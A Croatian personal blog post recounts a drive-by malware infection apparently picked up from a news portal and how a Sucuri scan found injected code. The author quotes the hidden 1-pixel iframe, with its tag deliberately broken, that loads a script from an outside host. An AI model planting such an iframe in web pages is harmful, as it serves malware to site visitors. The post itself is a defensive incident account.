Internet, Virus, Antivirus, Istraga

Posted by on lip. 26, 2013 in Internet, Mrežna sigurnost

Da imam kategoriju računalna sigurnost vrlo lako bi mogao ovaj članak strpati pod tu kategoriju. U zadnje vrijeme previše se slučajnosti dogodilo da zanemarim ovaj problem iako on možda nije realan ali previše slučajnosti može pokazati da zaista postoji problem a ono što sam naučio na offensive security PWB školovanju je da bi uvijek trebalo imati dozu paranoidnosti što se tiče mreže, interneta i sigurnosti.

Prije nekoliko dana sam poznaniku servisirao računalo koje je bilo zaraženo virusom koje je poznanik najvjerojatnije skupio preko interneta, isprva sam mislio da je došao preko emaila jer takav virus se obično šalje emailom. Nisam spajao svoj externi disk na svoj desktop poslije servisiranja tako da mogu isključiti prenošenje virusa na svoj desktop sa zaraženog računala. Nakon jednog dana od servisiranja poznanikova računala pokrenuo sam svoje vlastito računalo i krenuo surfati svojim uobičajenim stranicama u potrazi za vijestima u svijetu i lokalno. Prvo što sam posjetio je bio portal Slobodne Dalmacije slobodnadalmacija.hr i nakon nekoliko sekunda javio mi se prozor da se hoće instalirati neki određeni program, koji je to program bio nisam siguran jer se sve vrlo brzo odvijalo. Nakon što se pojavio taj program i pritiskajući opciju cancel ni to nije uspjelo pomoći da se taj program ne instalira. Nakon nekoliko sekunda antivirus mi je javio da je doslo do pokušaja mijenjanja registrija i da brzo skeniram računalo. Nakon što sam krenuo u sken već je antivirus bio onemogućen za realno skeniranje i onda nakon toga BAM, pojavi se slika sa nekom porukom. Nakon što sam brzo otišao preko cnrtl. alt. del. da isključim pokoji proces i nakon pojavljivanja task managera nije mi ponudio nikakvu otvorenu aplikaciju niti proces tako da sam brzo restartao i otišao u safe mode skenirati računalo. Čim sam pokrenuo sken našlo je nekoliko trojanaca sakrivenih u sistemu. Nazvao sam svoju djevojku i rekao da sam se najvjerojatnije zarazio preko portala Slobodne Dalmacije. Nakon što sam to rekao, njena prijateljica koja je bila uz nju je rekla da je i ona bila na tom portalu i da joj se na toj stranici isključio antivirus. Tada sam postao poprilično paranoičan jer sam shvatio da i moj poznanik je surfao na tom portalu. Hitno sam pokrenuo scan portala Slobodne Dalmacije na www.sucuri.net i isprva mi je pokazalo da je stranica blacklistana ali da nema nikakvog malware. Pitao sam se zašto je ta stranica blacklistana jer na ostalim scan siteovima je bila whitelisted. Pokrenu sam sken te internet stranice ponovo na sucuri i onda je javilo da stranica nije blacklisted već da je našlo vrstu malware u javascriptu na određenoj internet stranici.

Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
iframe src=”http://downloads.amsterdampub.sk/pagead/show_ads.js” style=”border:0px #FFFFFF none;” name=”test” scrolling=”no” frameborder=”1″ marginheight=”0px” marginwidth=”0px” height=”1px” width=”1px”

Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
iframe src=”http://downloads.amsterdampub.sk/pagead/show_ads.js” style=”border:0px #FFFFFF none;” name=”test” scrolling=”no” frameborder=”1″ marginheight=”0px” marginwidth=”0px” height=”1px” width=”1px”>/iframe>Ovaj iframe je sa moje strane isključen da se pokrene ali nakon što se upotpuni preko <> koda svašta se može dogoditi stoga nemojte niti pokušavati.

Leave a Reply

Vaša adresa e-pošte neće biti objavljena. Nužna polja su označena s *